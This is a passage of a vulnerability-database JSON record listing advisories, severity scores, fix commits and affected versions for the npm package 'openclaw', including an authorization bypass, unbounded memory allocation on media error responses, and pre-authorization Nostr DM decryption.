"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T17:34:13Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/54a0878517167c6e49900498cf77420dadb74beb" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5hff-46vh-rxmw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T17:34:13Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5hff-46vh-rxmw" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41298", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41298" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-session-termination-endpoint", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T17:34:13Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-session-termination-endpoint" }, { "reference_url": "https://github.com/advisories/GHSA-5hff-46vh-rxmw", "reference_id": "GHSA-5hff-46vh-rxmw", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5hff-46vh-rxmw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "CVE-2026-41298", "GHSA-5hff-46vh-rxmw" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7z2s-k6ty-ekg1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91092?format=api", "vulnerability_id": "VCID-816s-45wb-83ce", "summary": "OpenClaw: Remote media error responses could trigger unbounded memory allocation before failure\n## Summary\nRemote media HTTP error bodies were read without a hard size cap before failure handling, allowing unbounded allocation on error responses.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `81445a901091a5d27ef0b56fceedbe4724566438`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/media/fetch.ts now routes non-2xx failures through bounded prefix reads instead of buffering the whole error body.\n- src/media/read-response-with-limit.ts enforces capped reads and truncates oversized snippets before surfacing failure text.\n\nOpenClaw thanks @YLChen-007 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35633", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00157", "scoring_system": "epss", "scoring_elements": "0.36209", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00157", "scoring_system": "epss", "scoring_elements": "0.36246", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00157", "scoring_system": "epss", "scoring_elements": "0.36238", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35633" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35633", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35633" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses" }, { "reference_url": "https://github.com/advisories/GHSA-4qwc-c7g9-4xcw", "reference_id": "GHSA-4qwc-c7g9-4xcw", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4qwc-c7g9-4xcw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35633", "GHSA-4qwc-c7g9-4xcw" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-816s-45wb-83ce" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90791?format=api", "vulnerability_id": "VCID-849r-t5j1-vue8", "summary": "OpenClaw: Nostr inbound DMs could trigger unauthenticated crypto work before sender policy enforcement\n## Summary\nNostr inbound DM handling could perform crypto and dispatch work before sender and pairing policy enforcement, enabling unauthorized pre-auth computation.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `1ee9611079e81b9122f4bed01abb3d9f56206c77`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/nostr/src/channel.ts now performs authorization before decrypting and dispatching inbound DM content.\n- extensions/nostr/src/nostr-bus.ts adds pre-crypto authorization, size, and rate guardrails before expensive decrypt work.\n\nOpenClaw thanks @kuranikaran for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35627", "reference_id": 